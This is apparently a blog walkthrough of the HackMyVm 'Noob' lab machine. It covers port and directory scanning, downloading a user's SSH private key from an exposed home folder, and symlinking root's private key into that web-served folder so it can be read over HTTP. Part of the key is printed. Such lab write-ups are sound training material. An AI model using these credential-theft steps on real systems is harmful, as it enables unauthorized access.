日度归档:2021 年 8 月 7 日

HackMyVm Noob Walkthrough

发表评论

HackMyVm Noob Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Noob

Scan ports.

nmap -sV -sC -p- -oN ports.log 192.168.56.100
 Nmap scan report for secret.vinci.hmv (192.168.56.100)
 Host is up (0.0010s latency).
 Not shown: 65533 closed ports
 PORT      STATE SERVICE VERSION
 22/tcp    open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 66:6a:8e:22:cd:dd:75:52:a6:0a:46:06:bc:df:53:0f (RSA)
 |   256 c2:48:46:33:d4:fa:c0:e7:df:de:54:71:58:89:36:e8 (ECDSA)
 |_  256 5e:50:90:71:08:5a:88:62:7e:81:07:c3:9a:c1:c1:c6 (ED25519)
 65530/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
 |_http-title: Site doesn't have a title (text/plain; charset=utf-8).
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Check 65530 http.

 ~ curl http://192.168.56.100:65530
 404 page not found

Try /index.

 ~ curl http://192.168.56.100:65530/index
 Hi, You are close!

Scan dirs. Because too many fake response, we omit file extensions.

```bash
~ gobuster dir -u http://192.168.56.100:65530 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -b 401,403,404,500 --wildcard -o 65530.log
...

/index (Status: 200) [Size: 19]
/http%3A%2F%2Fwww (Status: 301) [Size: 45] [--> /http:/www]
/http%3A%2F%2Fyoutube (Status: 301) [Size: 49] [--> /http:/youtube]
/http%3A%2F%2Fblogs (Status: 301) [Size: 47] [--> /http:/blogs]
/http%3A%2F%2Fblog (Status: 301) [Size: 46] [--> /http:/blog]
/**http%3A%2F%2Fwww (Status: 301) [Size: 51] [--> /%2A%2Ahttp:/www]
/http%3A%2F%2Fcommunity (Status: 301) [Size: 51] [--> /http:/community]
/http%3A%2F%2Fradar (Status: 301) [Size: 47] [--> /http:/radar]
/http%3A%2F%2Fjeremiahgrossman (Status: 301) [Size: 58] [--> /http:/jeremiahgrossman]
/http%3A%2F%2Fweblog (Status: 301) [Size: 48] [--> /http:/weblog]
/http%3A%2F%2Fswik (Status: 301) [Size: 46] [--> /http:/swik]
/nt4share (Status: 301) [Size: 45] [--> /nt4share/]


Notice the last /nt4sare. Check it.

 ```bash
~ curl http://192.168.56.100:65530/nt4share/
 <pre>
 <a href=".Xauthority">.Xauthority</a>
 <a href=".bash_history">.bash_history</a>
 <a href=".bash_logout">.bash_logout</a>
 <a href=".bashrc">.bashrc</a>
 <a href=".profile">.profile</a>
 <a href=".ssh/">.ssh/</a>
 <a href="linpeas.sh">linpeas.sh</a>
 <a href="pspy64">pspy64</a>
 </pre>

It's a user's home folder. From .bash_history, we get an user name "adela".

~ curl ht```bash
tp://192.168.56.100:65530/nt4share/.bash_history
...
ls -la /opt
find / -user adela 2>/dev/null

 ...

From /.ssh, we download id_rsa, and login ssh as user adela.

```bash
 ~ chmod 600 id_rsa
 ~ ssh adela@192.168.56.100 -i id_rsa
 ...
 adela@noob:~$ id
 uid=1000(adela) gid=1000(adela) groups=1000(adela),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plu
 gdev),109(netdev)

The last step is tricky. Enum a lot but still can not find the way to root.

Create a symbolic link to /root/.ssh/id_rsa, then read it through http.

adela@noob:~$ ln -s /root/.ssh/id_rsa /home/adela/
 ...
 ~ curl http://192.168.56.100:65530/nt4share/id_rsa                    
 -----BEGIN OPENSSH PRIVATE KEY-----
 b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
 ...
 ZxNBqOXEOeZrCUy6ujhX4HeLih7BElkYwZEKvVbJti/I0RsdcbYGWlAPPBvi/8jZnQ7xaT
 T7Qx+xDGFV1hJakGHwAAAAlyb290QG5vb2I=
 -----END OPENSSH PRIVATE KEY-----